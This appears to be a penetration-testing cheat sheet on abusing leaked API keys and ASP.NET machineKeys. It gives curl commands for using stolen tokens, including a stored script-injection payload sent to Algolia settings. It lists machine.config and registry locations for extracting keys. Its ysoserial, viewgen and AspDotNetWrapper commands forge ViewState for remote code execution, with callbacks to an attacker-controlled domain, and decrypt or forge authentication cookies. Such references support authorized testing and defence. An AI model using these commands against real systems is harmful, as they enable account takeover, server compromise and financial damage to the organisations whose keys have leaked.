The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
- KeyFinder - is a tool that let you find keys while surfing the web!
- Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
- truffleHog - Find credentials all over the place
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity trufflehog git trufflehog github --endpoint --org trufflesecurity --token GITHUB_TOKEN --debug --concurrency 2
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
Use :
- Consuming the company's monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
- Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account
curl --request PUT \
--url https://<application-id><example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
curl -sX POST ""
curl ''
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' ''
curl --request GET --url --header 'authorization: Bearer TOKEN'
curl "<your_access_token>"
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c"
That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
- machineKey validationKey and decryptionKey
- __VIEWSTATE cookies
Example of a machineKey from
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Common locations of web.config / machine.config
- 32-bit
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config
- 64-bit
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config
- in registry when AutoGenerate is enabled (extract with
- HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4
- HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey
- Exploit with Blacklist3r/AspDotNetWrapper
- Exploit with ViewGen
# --webconfig WEBCONFIG: automatically load keys and algorithms from a web.config file
$ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
[+] ViewState is not encrypted
[+] Signature algorithm: SHA1
# --encrypteddata : __VIEWSTATE parameter value of the target application
# --modifier : __VIEWSTATEGENERATOR parameter value
$ AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <real viewstate value> --purpose=viewstate --modifier=<modifier value> –macdecode
$ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
$ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=CA0B0334 --macdecode
$ .\AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"
NOTE: Send a POST request with the generated ViewState to the same endpoint, in Burp you should URL Encode Key Characters for your payload.
$ ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup <your collab domain>" --decryptionalg="AES" --generator=ABABABAB decryptionkey="<decryption key>" --validationalg="SHA1" --validationkey="<validation key>"
$ ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "echo 123 > c:\pwn.txt" --generator="CA0B0334" --validationalg="MD5" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "C:\Users\zhu\Desktop\ExploitClass.cs;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.dll;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="b07b0f97365416288cf0247cffdf135d25f6be87"
$ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"
If you have the machineKey but the viewstate is disabled. Forms Authentication Cookies :
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is sk
, jackpot. If it's pk
or tk
, it's not worth your time.
#Check token validity
curl ""
#Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropiate scope)
curl ""
- Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019
- Private API key leakage due to lack of access control - yox - August 8, 2018
- Project Blacklist3r - November 23, 2018 - @notsosecure
- Saying Goodbye to my Favorite 5 Minute P1 - Allyson O'Malley - January 6, 2020
- Mapbox API Token Documentation